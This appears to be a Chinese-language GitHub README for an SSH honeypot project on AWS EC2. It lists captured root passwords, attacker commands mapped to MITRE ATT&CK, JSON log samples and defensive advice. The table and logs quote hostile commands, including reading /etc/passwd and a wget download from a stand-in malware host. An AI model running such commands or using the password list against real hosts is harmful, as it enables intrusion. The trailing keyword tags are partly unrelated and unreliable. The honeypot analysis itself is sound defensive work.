nssriraam/SSH-Honeypot-Attack-Analysis

# 🍯 SSH Honeypot 与攻击分析     ## 📌 项目概述 在 AWS EC2 (EU-North-1) 上部署了 Cowrie SSH Honeypot，并在 2222 端口开放，以捕获真实世界的攻击行为。记录了攻击者的凭证、命令和会话数据，用于威胁分析和 MITRE ATT&CK 映射。 ## 🛠️ 工具与技术 | Tool | Purpose | |------|---------| | Cowrie 2.9.14 | SSH honeypot 框架 | | AWS EC2 (t3.micro) | 云部署 — EU North 1 | | Ubuntu 24.04 | 主机操作系统 | | Python 3.12 | Cowrie 运行时 | | JSON Logs | 结构化攻击数据捕获 | ## 🏗️ 实验环境搭建 - **云服务商:** AWS EC2 — EU North 1 (Stockholm) - **实例类型:** t3.micro (Ubuntu 24.04) - **Honeypot 端口:** 2222 (对 0.0.0.0/0 开放) - **真实 SSH 端口:** 22 (仅限管理员访问) - **Cowrie 版本:** 2.9.14 ``` Internet │ ▼ AWS EC2 (13.60.247.212) ├── Port 22 → Real SSH (admin only) └── Port 2222 → Cowrie Honeypot (public) │ ▼ Fake Debian Shell (svr04) │ ▼ JSON Logs → Analysis ``` ## 📊 捕获的攻击数据 ### 会话摘要 | Metric | Value | |--------|-------| | 总会话数 | 16 | | 观察时长 | ~35 分钟 | | 捕获的唯一密码数 | 16 | | 执行的命令数 | 4 | | 恶意软件下载尝试 | 1 | ### 🔑 捕获的凭证 | # | Username | Password | Pattern | |---|----------|----------|---------| | 1 | root | admin123 | 常见默认密码 | | 2 | root | hello123 | 字典 + 数字 | | 3 | root | admin 123 | 空格变体 | | 4 | root | password123455 | 常见基础 + 数字 | | 5 | root | pswwrd | 拼写错误变体 | | 6 | root | 1234556789 | 数字序列 | | 7 | root | hellopass | 字典组合 | | 8 | root | pasas | 短弱密码 | | 9 | root | root123 | 用户名 + 数字 | | 10 | root | fastcrack3455 | 自定义字典 | | 11 | root | required | 单个字典单词 | | 12 | root | debian123 | 操作系统名称 + 数字 | | 13 | root | user123 | 通用词 + 数字 | | 14 | root | User123 | 大小写变体 | | 15 | root | Rootuser | 用户名反向组合 | | 16 | root | rootuser | 小写变体 | ### 💻 攻击者执行的命令 | Command | Purpose | MITRE Technique | |---------|---------|-----------------| | `whoami` | 权限检查 | T1033 | | `cat /etc/passwd` | 用户枚举 | T1087.001 | | `uname -a` | 系统指纹识别 | T1082 | | `wget http://malware.com/evil.sh` | 恶意软件下载尝试 | T1105 | ## 🎯 MITRE ATT&CK 映射 | Tactic | Technique | ID | Observed Behavior | |--------|-----------|-----|-------------------| | 初始访问 | 暴力破解：密码喷洒 | T1110.003 | 针对 root 进行了 16 次密码尝试 | | 发现 | 系统信息发现 | T1082 | 执行了 `uname -a` | | 发现 | 账户发现：本地账户 | T1087.001 | 执行了 `cat /etc/passwd` | | 权限提升 | 有效账户：本地账户 | T1078.003 | 直接以 root 身份登录 | | 命令与控制 | 入站工具传输 | T1105 | 尝试使用 `wget` 下载恶意软件 | ## 🔍 关键发现 1. **专门针对 root 账户** — 100% 的尝试使用 `root`，这与自动化 SSH 扫描器一致 2. **自动化暴力破解模式** — 会话 2–16 显示间隔为 2–4 秒，表明使用了脚本工具 3. **弱密码字典** — 密码与 RockYou 和 SecLists 等常见列表匹配 4. **即时后渗透操作** — 攻击者在获得访问权限后 90 秒内运行了 4 条命令 5. **尝试传递恶意软件** — 使用 `wget` 拉取外部 payload；被沙箱 DNS 隔离阻止 6. **Cowrie 欺骗成功** — 攻击者与伪造 shell 交互了 295 秒未被发觉 ## 📁 日志样本 ``` {"eventid":"cowrie.login.success","username":"root","password":"admin123","src_ip":"223.237.190.129","timestamp":"2026-03-15T15:01:42Z"} {"eventid":"cowrie.command.input","input":"whoami","src_ip":"223.237.190.129","timestamp":"2026-03-15T15:02:36Z"} {"eventid":"cowrie.command.input","input":"cat /etc/passwd","src_ip":"223.237.190.129","timestamp":"2026-03-15T15:02:42Z"} {"eventid":"cowrie.command.input","input":"wget http://malware.com/evil.sh","src_ip":"223.237.190.129","timestamp":"2026-03-15T15:03:01Z"} {"eventid":"cowrie.session.closed","duration":"295.2","src_ip":"223.237.190.129","timestamp":"2026-03-15T15:06:19Z"} ``` ## 🛡️ 防御建议 | Finding | Recommendation | |---------|---------------| | Root 暴力破解 | 禁用 root SSH 登录 (`PermitRootLogin no`) | | 弱密码 | 强制使用强密码 / 仅使用 SSH 密钥 | | 自动化扫描 | 实施 fail2ban 或速率限制 | | 恶意软件下载 | 阻止对未知域名的出站 wget/curl 请求 | | 登录后侦察 | 对登录后快速连续执行的命令发出警报 | ## 📂 仓库结构 ``` SSH-Honeypot-Attack-Analysis/ ├── README.md ├── logs/ │ └── cowrie.json # Raw honeypot log data ├── analysis/ │ └── attack_summary.md # Detailed attack analysis └── screenshots/ └── (terminal screenshots) ``` ## ✅ 展示的技能 - 云基础设施上的 Honeypot 部署与配置 - SSH 暴力破解攻击检测与分析 - 凭证收集模式识别 - MITRE ATT&CK 威胁映射 - 结构化 JSON 日志分析 - AWS EC2 安全组配置 - 威胁情报报告 ## 📌 参考资料 - [Cowrie GitHub](https://github.com/cowrie/cowrie) - [MITRE ATT&CK T1110.003](https://attack.mitre.org/techniques/T1110/003/) - [MITRE ATT&CK T1082](https://attack.mitre.org/techniques/T1082/) - [MITRE ATT&CK T1105](https://attack.mitre.org/techniques/T1105/)

标签：AWS EC2, Cloudflare, Homebrew安装, JSON日志分析, MITRE ATT&CK, PB级数据处理, PoC, Python, SSH蜜罐, 威胁情报, 安全运维, 开发者工具, 恶意软件下载, 攻击行为分析, 无后门, 无线安全, 暴力破解, 端口映射, 系统侦察, 红队行动, 网络信息收集, 网络安全, 蜜罐, 蜜罐实验, 证书利用, 进程注入, 逆向工具, 防御部署, 隐私保护